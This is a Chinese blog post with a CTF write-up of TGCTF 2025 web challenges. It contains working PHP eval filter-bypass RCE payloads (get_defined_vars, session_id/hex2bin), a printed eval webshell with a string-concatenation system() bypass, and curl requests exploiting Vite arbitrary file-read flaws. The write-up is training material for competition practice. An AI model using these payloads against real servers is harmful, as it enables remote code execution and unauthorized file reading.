<!DOCTYPE html><html lang="zh-CN" data-theme="Game"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>TGCTFweb部分 | Wea5e1-B10G</title><meta name="author" content="Wea5e1"><meta name="copyright" content="Wea5e1"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="TGCTFAAA偷渡阴平:&lt;?php$tgctf2025&#x3D;$_GET[&#x27;tgctf2025&#x27;];if(!preg_match(&quot;&#x2F;0|1|[3-9]|\~|\&#96;|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\&#x3D;|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\">
<meta property="og:type" content="article">
<meta property="og:title" content="TGCTFweb部分">
<meta property="og:url" content="http://example.com/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/index.html">
<meta property="og:site_name" content="Wea5e1-B10G">
<meta property="og:description" content="TGCTFAAA偷渡阴平:&lt;?php$tgctf2025&#x3D;$_GET[&#x27;tgctf2025&#x27;];if(!preg_match(&quot;&#x2F;0|1|[3-9]|\~|\&#96;|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\&#x3D;|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/2.jpg">
<meta property="article:published_time" content="2025-05-10T07:24:39.000Z">
<meta property="article:modified_time" content="2025-05-10T07:26:08.469Z">
<meta property="article:author" content="Wea5e1">
<meta property="article:tag" content="ctf复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/2.jpg"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "TGCTFweb部分",
  "url": "http://example.com/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/",
  "image": "http://example.com/img/2.jpg",
  "datePublished": "2025-05-10T07:24:39.000Z",
  "dateModified": "2025-05-10T07:26:08.469Z",
  "author": [
    {
      "@type": "Person",
      "name": "Wea5e1",
      "url": "http://example.com/"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicons.png"><link rel="canonical" href="http://example.com/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: true,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'TGCTFweb部分',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><link rel="stylesheet" href="/css/background.css"><link rel="stylesheet" href="/css/universe.css"><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.elemecdn.com/hexo-butterfly-wowjs/lib/animate.min.css" media="print" onload="this.media='all'"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body><script>window.paceOptions = {
  restartOnPushState: false
}

btf.addGlobalFn('pjaxSend', () => {
  Pace.restart()
}, 'pace_restart')

</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css"/><script src="https://cdn.jsdelivr.net/npm/pace-js/pace.min.js"></script><div id="web_bg" style="background: [object Object];"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="/img/favicons.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fa fa-graduation-cap"></i><span> 博文</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/categories/"><i class="fa-fw fa fa-archive"></i><span> 分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fa fa-folder-open"></i><span> 归档</span></a></li></ul></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> 生活</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/shuoshuo/"><i class="fa-fw fa fa-comments-o"></i><span> 分享</span></a></li><li><a class="site-page child" href="/photos/"><i class="fa-fw fa fa-camera-retro"></i><span> 相册</span></a></li><li><a class="site-page child" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 影视</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/links/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/comment/"><i class="fa-fw fa fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于笔者</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(/img/2.jpg);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Wea5e1-B10G</span></a><a class="nav-page-title" href="/"><span class="site-name">TGCTFweb部分</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fa fa-graduation-cap"></i><span> 博文</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/categories/"><i class="fa-fw fa fa-archive"></i><span> 分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fa fa-folder-open"></i><span> 归档</span></a></li></ul></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> 生活</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/shuoshuo/"><i class="fa-fw fa fa-comments-o"></i><span> 分享</span></a></li><li><a class="site-page child" href="/photos/"><i class="fa-fw fa fa-camera-retro"></i><span> 相册</span></a></li><li><a class="site-page child" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 影视</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/links/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/comment/"><i class="fa-fw fa fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于笔者</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">TGCTFweb部分</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2025-05-10T07:24:39.000Z" title="发表于 2025-05-10 15:24:39">2025-05-10</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2025-05-10T07:26:08.469Z" title="更新于 2025-05-10 15:26:08">2025-05-10</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">总字数:</span><span class="word-count">813</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>3分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><h1 id="TGCTF"><a href="#TGCTF" class="headerlink" title="TGCTF"></a>TGCTF</h1><h2 id="AAA偷渡阴平"><a href="#AAA偷渡阴平" class="headerlink" title="AAA偷渡阴平:"></a><strong>AAA偷渡阴平</strong>:</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$tgctf2025</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;tgctf2025&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="variable">$tgctf2025</span>))&#123;</span><br><span class="line">    <span class="comment">//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi</span></span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$tgctf2025</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;(╯‵□′)╯炸弹！•••*～●&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<p>打开一看发现过滤了一些特殊符号和1和3到9(感觉有点刻意了没有2(😀))这个是eval，正常是使用system的，不过’’””&#96;&#96;都过滤了，正好sun师傅之前让我看看无参数rce，有用场了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">var_dump(getallheaders());先试试water,可以 不过我还是喜欢使用get_defined_vars()这个，因为第一个是使用heard头，感觉有点麻烦了</span><br><span class="line">var_dump(get_defined_vars());&amp;b=111 发现：</span><br><span class="line">array(5) &#123; [&quot;_GET&quot;]=&gt; array(2) &#123; [&quot;tgctf2025&quot;]=&gt; string(29) &quot;var_dump(get_defined_vars());&quot; [&quot;b&quot;]=&gt; string(3) &quot;111&quot; &#125; [&quot;_POST&quot;]=&gt; array(0) &#123; &#125; [&quot;_COOKIE&quot;]=&gt; array(1) &#123; [&quot;PHPSESSID&quot;]=&gt; string(32) &quot;26d0ac1ba2391440de04672e76f50b31&quot; &#125; [&quot;_FILES&quot;]=&gt; array(0) &#123; &#125; [&quot;tgctf2025&quot;]=&gt; string(29) &quot;var_dump(get_defined_vars());&quot; &#125; </span><br><span class="line">ok了，可以进行rce了</span><br><span class="line">?tgctf2025=eval(end(current(get_defined_vars())));&amp;b=system(&#x27;ls /&#x27;);</span><br><span class="line">?tgctf2025=eval(end(current(get_defined_vars())));&amp;b=system(&#x27;tac /flag&#x27;);</span><br><span class="line">(不过有2的话还可以session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a)</span><br></pre></td></tr></table></figure>

<h2 id="AAA偷渡阴平（复仇）"><a href="#AAA偷渡阴平（复仇）" class="headerlink" title="AAA偷渡阴平（复仇）:"></a><strong>AAA偷渡阴平（复仇）</strong>:</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$tgctf2025</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;tgctf2025&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\（|\）|\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i&quot;</span>, <span class="variable">$tgctf2025</span>))&#123;</span><br><span class="line">    <span class="comment">//hint：你可以对着键盘一个一个看，然后在没过滤的符号上用记号笔画一下（bushi</span></span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$tgctf2025</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;(╯‵□′)╯炸弹！•••*～●&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">?tgctf2025session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a</span><br><span class="line">这个过滤了一些函数之前的肯定使用不了了(毕竟是复仇吗哈哈哈哈)</span><br></pre></td></tr></table></figure>

<h2 id="前端GAME："><a href="#前端GAME：" class="headerlink" title="前端GAME："></a><strong>前端GAME</strong>：</h2><p>打开是一个消消乐，玩了玩(不过首先肯定是要看一下前端js的)发现只要分数高于17分就显示&#x2F;tgflagggg,不过肯定是直接访问不了的，</p>
<p>发现了这里的<code>vite</code>想起这里是有一个任意文件读取的漏洞的，在网上看了看，发现CVE-2025-30208，就ok了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">curl &quot;url+?import&amp;raw&quot;(url是你自己访问不了的地址)(不知道为什么在抖音上面看到了，大数据是懂我的)</span><br></pre></td></tr></table></figure>



<h2 id="火眼辩魑魅："><a href="#火眼辩魑魅：" class="headerlink" title="火眼辩魑魅："></a><strong>火眼辩魑魅</strong>：</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line">shell学姐会让青春CTF少年脸红吗？只有一个洞是通的，看不出来的话就尝试每个漏洞都试一遍哦，杂鱼~</span><br></pre></td></tr></table></figure>

<p>额，什么都没有。dirsearch来扫一下，发现</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">User-Agent: *</span><br><span class="line">Disallow: tgupload.php</span><br><span class="line">Disallow: tgshell.php</span><br><span class="line">Disallow: tgxff.php</span><br><span class="line">Disallow: tgser.php</span><br><span class="line">Disallow: tgphp.php</span><br><span class="line">Disallow: tginclude.php</span><br></pre></td></tr></table></figure>

<p>因为是shell学姐吗，直接看tgshell.php(其实是手里面有sun师傅独特的rce骚操作(感觉rce的骚姿势都好变态))（其他的后面再补充）</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $shell=$_POST[&quot;shell&quot;];</span><br><span class="line">    &#123;</span><br><span class="line">        eval($shell);</span><br><span class="line">   &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>随便试了试发现有waf，不慌，直接拿sun师傅rce骚操作一个个试(其实可以直接蚁剑直接连接的)</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">shell=$a=&#x27;syst&#x27;.&#x27;em&#x27;;$a(&#x27;ls /&#x27;); ok了；爽了</span><br></pre></td></tr></table></figure>

<h2 id="前端GAME-Plus："><a href="#前端GAME-Plus：" class="headerlink" title="前端GAME Plus："></a><strong>前端GAME Plus</strong>：</h2><p>(不如pro max)</p>
<p>这个就又是cve的了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">curl &quot;http://127.0.0.1:52091/tgflagggg?.svg?.wasm?init&quot;</span><br></pre></td></tr></table></figure>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="http://example.com">Wea5e1</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2025/05/10/TGCTFweb%E9%83%A8%E5%88%86/">http://example.com/2025/05/10/TGCTFweb部分/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="http://example.com" target="_blank">Wea5e1-B10G</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/ctf%E5%A4%8D%E7%8E%B0/">ctf复现</a></div><div class="post-share"><div class="social-share" data-image="/img/2.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i>赞助</div><div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/img/money.jpg" target="_blank"><img class="post-qr-code-img" src="/img/money.jpg" alt="微信 wea5e1 0天 没有吃饭了,求求了"/></a><div class="post-qr-code-desc">微信 wea5e1 0天 没有吃饭了,求求了</div></li></ul></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related full-width" href="/2025/04/24/php%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93%E4%B8%8B/" title="php特性总结下"><img class="cover" src="/img/17.jpg" onerror="onerror=null;src='/img/4040.jpg'" alt="cover of previous post"><div class="info"><div class="info-1"><div class="info-item-1">上一篇</div><div class="info-item-2">php特性总结下</div></div><div class="info-2"><div class="info-item-1">4.变量覆盖：在PHP中，符号表（Symbol Table）是一个内部数据结构，用于跟踪当前脚本中定义的变量和它们的值。在PHP脚本执行期间，符号表记录了所有已经声明的变量及其对应的值，并且可以动态地添加、修改和删除这些变量。 extract：PHP extract() 函数用于将数组中的键作为变量名，将对应的值作为变量值导入到当前程序的符号表中 extract()导入变量名和值时，如果原来已经存在相同的变量名，那么旧的值会被数组中同名的健对应的值替换掉 &lt;?php// 用户通过表单提交了一些数据，例如：$hobby=&#x27;play&#x27;;// 为了方便，直接使用 extract() 函数将 $_GET 数据导入到当前符号表中,以便后续使用extract($_GET);echo &quot;用户: &quot;.$name.&quot; 性别: &quot;.$sex.&quot;&lt;br&gt;&quot;;echo &quot;your hobby is...</div></div></div></a></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><a class="pagination-related" href="/2025/03/16/emojictfweb/" title="emojictfweb"><img class="cover" src="/img/7.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-03-16</div><div class="info-item-2">emojictfweb</div></div><div class="info-2"><div class="info-item-1">emojictfwebRCE:发现f12不能使用，没事，张师傅给我说ctrl+shift+i就可以了，ok.试了试发现没有有用的东西，dirsearch扫描一下发现robots.txt 然后发现 &#x2F;fl@g.php,查看： &lt;?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET[&#x27;emo&#x27;]))&#123;   $emo = $_GET[&#x27;emo&#x27;];  if(!preg_match(&quot;/\;|\&quot;|\*| |[b-h]|[m-r]|\\$|\&#123;|\&#125;|\^|\&gt;/i&quot;,$emo))&#123;    system($emo);  &#125;  else&#123;    echo &quot;Again&quot;;    &#125;&#125;else&#123;  echo...</div></div></div></a><a class="pagination-related" href="/2025/03/16/isctf2024web/" title="isctf2024web"><img class="cover" src="/img/20.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-03-16</div><div class="info-item-2">isctf2024web</div></div><div class="info-2"><div class="info-item-1">ISCTF2024：1z_php:if(isset($_POST[&#x27;J&#x27;]))&#123;  $call=$_POST[&#x27;J&#x27;];  $dangerous_commands = [&#x27;cat&#x27;, &#x27;tac&#x27;, &#x27;head&#x27;, &#x27;nl&#x27;, &#x27;more&#x27;, &#x27;less&#x27;, &#x27;tail&#x27;, &#x27;vi&#x27;, &#x27;sed&#x27;, &#x27;od&#x27;];  foreach ($dangerous_commands as $command) &#123;    if (preg_match(&quot;/$command/i&quot;, $call)) &#123;      die(&quot;这些个危险函数可不兴使啊&quot;);    &#125;  &#125;  system($call);&#125;?&gt;  J&#x3D;ls &#x2F;  ...</div></div></div></a><a class="pagination-related" href="/2025/03/17/isctf2023web%E9%83%A8%E5%88%86wp/" title="isctf2023web部分wp"><img class="cover" src="/img/1.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-03-17</div><div class="info-item-2">isctf2023web部分wp</div></div><div class="info-2"><div class="info-item-1">isctf2023web部分wp圣杯战争!!!：&lt;?php highlight_file(__FILE__); error_reporting(0); class artifact&#123;   public $excalibuer;   public $arrow;   public function __toString()&#123;     echo &quot;为Saber选择了对的武器!&lt;br&gt;&quot;;     return $this-&gt;excalibuer-&gt;arrow;   &#125; &#125; class prepare&#123;   public $release;   public function __get($key)&#123;     $functioin = $this-&gt;release;     echo &quot;蓄力!咖喱棒！！&lt;br&gt;&quot;;     return $functioin();   &#125; &#125; class saber&#123;  ...</div></div></div></a><a class="pagination-related" href="/2025/03/18/basectf2024web%E9%83%A8%E5%88%86wp/" title="basectf2024web部分wp"><img class="cover" src="/img/11.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-03-18</div><div class="info-item-2">basectf2024web部分wp</div></div><div class="info-2"><div class="info-item-1">basectf2024web部分wpA Dark Room：源码； Aura 酱的礼物：&lt;?php highlight_file(__FILE__); // Aura 酱，欢迎回家~ // 这里有一份礼物，请你签收一下哟~ $pen = $_POST[&#x27;pen&#x27;]; if (file_get_contents($pen) !== &#x27;Aura&#x27;) &#123;   die(&#x27;这是 Aura 的礼物，你不是 Aura！&#x27;); &#125; // 礼物收到啦，接下来要去博客里面写下感想哦~ $challenge = $_POST[&#x27;challenge&#x27;]; if (strpos($challenge, &#x27;http://jasmineaura.github.io&#x27;) !== 0) &#123;   die(&#x27;这不是 Aura 的博客！&#x27;); &#125; $blog_content = file_get_contents($challenge); if...</div></div></div></a><a class="pagination-related" href="/2025/04/07/%E5%A4%8D%E7%8E%B0xyctf2024/" title="复现xyctf2024"><img class="cover" src="/img/17.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-04-07</div><div class="info-item-2">复现xyctf2024</div></div><div class="info-2"><div class="info-item-1">XYCTF:EZhttp:进行dirsearch查看有没有其他东西；发现robots.txt文件，然后一步一步进行，发现账号和密码发现说不是yuanshen.com的不要；改referer；Referer:yuanshen.com发现说不是XYCTF的浏览器；改UA头；User-Agent: XYCTF发现不是本地用户不能访问；client-IP:127.0.0.1发现不是ymzx.qq.com的代理;改via; via:ymzx.qq.com发现想吃cookie的小饼干；改cookie为XYCTF;获得flag  EZMAKE:先测试一下一些命令；然后试试新学的echo $(&lt;flag)这个命令是将flag给重定向出来然后echo出来 发现被过滤双写试试得到flag ez?Make:然后上面的方法用不了了；可以试试pwd查看当前的目录；然后看看cd ..可以用吗，发现可以使用； ok了，可以cd ..&amp;&amp;cd ..&amp;&amp;cd ..&amp;&amp;more...</div></div></div></a><a class="pagination-related" href="/2025/04/09/xyctf2025web%E9%83%A8%E5%88%86wp/" title="xyctf2025web部分wp"><img class="cover" src="/img/5.jpg" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2025-04-09</div><div class="info-item-2">xyctf2025web部分wp</div></div><div class="info-2"><div class="info-item-1">XYCTF2025ezsql(手动滑稽)：(真的没有想到是宽字节注入,第一次做，没有做出来，问学长要wp，我还没有复现出来，我是傻逼，现在只能复现了) 首先看见题目是sql注入漏洞，打开是让你登录平台，然后就fuzz测试过滤了空格,转义了’(所以要宽字节注入)，关键字到是没有 然后就是使用substring这个函数： 解释：SUBSTRING(str, pos,...</div></div></div></a></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/favicons.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">Wea5e1</div><div class="author-info-description">归途也还可爱</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="tencent://AddContact/?fromId=45&amp;fromSubId=1&amp;subcmd=all&amp;uin=3522700034&amp;website=www.oicqzone.com" target="_blank" title="QQ"><i class="fab fa-qq"></i></a><a class="social-icon" href="mailto:3522700034@qq.com" target="_blank" title="Email"><i class="fas fa-envelope-open-text"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is rookie Wea5e1 的 妙妙屋</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content is-expand"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TGCTF"><span class="toc-number">1.</span> <span class="toc-text">TGCTF</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#AAA%E5%81%B7%E6%B8%A1%E9%98%B4%E5%B9%B3"><span class="toc-number">1.1.</span> <span class="toc-text">AAA偷渡阴平:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AAA%E5%81%B7%E6%B8%A1%E9%98%B4%E5%B9%B3%EF%BC%88%E5%A4%8D%E4%BB%87%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">AAA偷渡阴平（复仇）:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%AB%AFGAME%EF%BC%9A"><span class="toc-number">1.3.</span> <span class="toc-text">前端GAME：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" 